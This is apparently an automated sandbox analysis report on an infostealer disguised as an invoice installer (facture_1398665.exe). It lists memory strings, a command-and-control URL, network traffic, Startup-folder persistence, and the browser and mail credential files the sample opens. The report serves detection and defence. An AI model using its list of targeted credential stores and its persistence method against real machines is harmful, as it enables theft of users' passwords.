Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0OJl.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0OJl?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Os8.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Os8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Qbo.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Qbo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Snc.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Snc?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx13Ya.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx13Ya?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBxm7t6.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
Source: bhv57BC.tmp.12.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBxm7t6?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: firefox.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe.4.drString found in binary or memory: http://ocsp.digicert.com0N
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: firefox.exe.4.drString found in binary or memory: http://ocsp.thawte.com0
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-eus-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-eus-s-msn-com.akamaized.net/nl-nl/homepage/_sc/css/f15f847b-3ed230f6/direction=ltr.
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-eus-s-msn-com.akamaized.net/nl-nl/homepage/_sc/js/f15f847b-f1a914ba/direction=ltr.l
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-eus-s-msn-com.akamaized.net/sc/9b/e151e5.gif
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/nl-nl/homepage/_sc/css/208e221e-78792e3d/direction=ltr.
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/nl-nl/homepage/_sc/js/208e221e-9935f8da/direction=ltr.l
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/2b/a5ea21.ico
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/4e/f3be46.woff
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/9b/e151e5.gif
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/51/fdd733fc193cd8c9207c5338107240.jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/65/e8a77758e8644573ba5d41ada16e8c.jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/7d/30f1c30a21f2240e5abc7b24a3a057.jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/b9/688ba69ea7a207af53ba3184ed8c56.jpg
Source: firefox.exe.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: firefox.exe.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: firefox.exe.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.bing.com/bingbot.htm)
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.bing.com/bingbot.htm)Q
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.bing.com/favicon.ico
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: facture_1398665.exe, 00000002.00000003.12809044783.01380000.00000004.sdmp, facture_1398665.tmp, facture_1398665.tmp, 00000003.00000000.12811592110.00401000.00000020.sdmp, facture_1398665.tmp.2.drString found in binary or memory: http://www.innosetup.com/
Source: facture_1398665.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: facture_1398665.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: is-599GA.tmp.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe.4.drString found in binary or memory: http://www.mozilla.com0
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.msn.com/
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: dllhost.exe, 00000008.00000002.13107360851.01670000.00000004.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: facture_1398665.exe, 00000002.00000003.12809044783.01380000.00000004.sdmp, facture_1398665.tmp, facture_1398665.tmp.2.drString found in binary or memory: http://www.remobjects.com/ps
Source: facture_1398665.exe, 00000002.00000003.12841468374.01281000.00000004.sdmp, facture_1398665.tmp, 00000003.00000002.12831159955.014E1000.00000004.sdmpString found in binary or memory: http://www.test.com/
Source: facture_1398665.exe, 00000002.00000003.12808805294.01380000.00000004.sdmp, facture_1398665.tmp, 00000003.00000003.12813733348.02490000.00000004.sdmpString found in binary or memory: http://www.test.com/(http://www.test.com/(http://www.test.com/
Source: facture_1398665.exe, 00000002.00000003.12841468374.01281000.00000004.sdmpString found in binary or memory: http://www.test.com/1
Source: facture_1398665.exe, 00000002.00000003.12841468374.01281000.00000004.sdmpString found in binary or memory: http://www.test.com/q
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.usertrust.com1
Source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp, firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmpString found in binary or memory: https://b
Source: firefox.exe.4.drString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://truand-2-la-galere.money/
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://truand-2-la-galere.money/Q
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://truand-2-la-galere.money/admin/nsm.php?F48A04623C4E0000
Source: firefox.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49217
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
Source: unknownNetwork traffic detected: HTTP traffic on port 49217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201

Boot Survival:

barindex
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnkJump to behavior
Stores files to the Windows start menu directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnkJump to behavior

Stealing of Sensitive Information:

barindex
Searches for Windows Mail specific filesShow sources
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknownJump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknownJump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknownJump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *Jump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknownJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\098A3394207ED67B189FE76C2DC12503C3C08949Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\CE878AF4D6089481AC21378C5017FC97F30E7ADBJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\D884B3C0D6FDA5EAB04FCB8FC7E00A32EAD9147DJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\0ACF70C2B13F90BCCE7A52239424071DF5436F7BJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\CE40DF72E47995F12B7A0C9DB884C82D865203F5Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\EE3B023192255EF0F8BF72624FD26BCBEA167009Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\CA3B4F6C3670A7775C21F456BFC6AE66E765D830Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\505E6E43C2A9FD25648488269AA49528B3B8B6DEJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\9D5CCF1EF546D43662C8D258C04D271045A57285Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\38F74FDB1007352CF593939F58B86ABEC18A7F95Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708EJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\228A34E27343511229AA075674752A42E75408BDJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\01974EBFBB850697430A4F12734195ED05077738Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.defaultJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert7.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqliteJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\5118460E55865416751E8062BAB1E7C4F471E49DJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F498ADAC6BF11455860012AC807BE6C78952E1EDJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\2E3CB874702C1D5349B27C8399A6E3FCF8D8224FJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\E3D13C4D3E3F56773BFB6A7E2AC5F1A24F83F5FEJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F17BF163CA7D855DE2D59C9C9925270D09724B92Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F045CCBF583BD17042216E343183D80AC87C5FB9Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\AF64C36C1E91371D6368F8CCA8AED4DE577941DAJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\doomedJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\E325B486B777C14C29762600D998974140F8FD34Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\92531506A03012426BA6B1963DED1B2B4B032D26Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1BJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\9F133021167E7F8282CC52C8D01EA90928166C26Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\6C74841001D328873ED43FCA9D5F4071C6D772B0Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\8179DFAE4FED04E4AFC32B457F9A3FD29DB817EBJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\29069ED1065B580BDC977A33A70AE7B2505EB534Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\EF266C446B089CF06B1E028D371C054ABCDEBA8DJump to behavior
